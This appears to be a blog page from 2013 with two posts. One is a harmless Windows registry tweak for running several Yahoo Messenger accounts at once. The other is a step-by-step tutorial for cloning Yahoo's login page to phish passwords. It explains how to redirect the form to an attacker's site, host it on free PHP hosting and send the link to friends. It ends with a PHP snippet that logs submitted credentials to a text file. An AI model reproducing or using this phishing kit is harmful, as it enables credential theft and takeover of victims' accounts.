Showing posts with label Yahoo Hack. Show all posts
Showing posts with label Yahoo Hack. Show all posts

Friday, July 26, 2013

How to open multiple yahoo in XP ♥

Hello Guys, today I'm gonna tell you about an old Yahoo Messenger trick from which you can open multiple Yahoo accounts at the same time. If you have two yahoo accounts then you can open both at the same time.


How to open multiple yahoo

  • First of all Go to Start->Run->Type regedit
  • Then Press "Enter" Button.
  • Click on HKEY_CURRENT_USER on left side.
    Click on Software folder under 
  • Click on Yahoo folder under Software.
  • Click on the plus sign near the folder Pager.
  • Right Click on the folder name Test->New->DWORD Value
  • Right side you will get a file named New Value #1
  • Right Click on the file New Value #1 and Rename it as Plural and press enter
  • Double Click on the file Plural
  • You will get a windown named Edit DWORD Value
  • Type 1 inside 'Select the Value data' and press enter
  • Close the registry editor window



Now with my this trick you can launch multiple windows and use different ID's.
1

Wednesday, April 24, 2013

Hack yahoo using fake login page


In this post I'll show you to hack yahoo using fake login page to hack yahoo in simple steps. A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo, Gmail etc.However, these Fake login pages are created just for the purpose of stealing other's passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.





Hack yahoo using fake login page - Procedure




STEP 1.

Go to the Yahoo login page by typing the following URL.

mail.yahoo.com



STEP 2.


Once the Yahoo login page is loaded, Save the page as Complete HTML File (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.


STEP 3.

Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


STEP 4.

Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML


STEP 5.

Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src="Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif"

Rename the above link into

src="files/ma_mail_1.gif"

Repeat the same procedure for every file contained in the folder by name "files".

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for ".gif". Repeat the Step 5 for every .gif file.


STEP 6. 

Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.


STEP 7.

Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP


Tip: 110mb.com, Blackapplehost.com etc supports PHP


STEP 8.

Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search aphp script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.


STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

here is the login script which i am posting due to large number of request..



header("Location: http://WEBSITE ");$handle =
fopen("pass.txt", "a");foreach($_GET as
$variable => $value) {fwrite($handle,
$variable);fwrite($handle, "=");
fwrite($handle, $value);fwrite($handle,
"\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;



12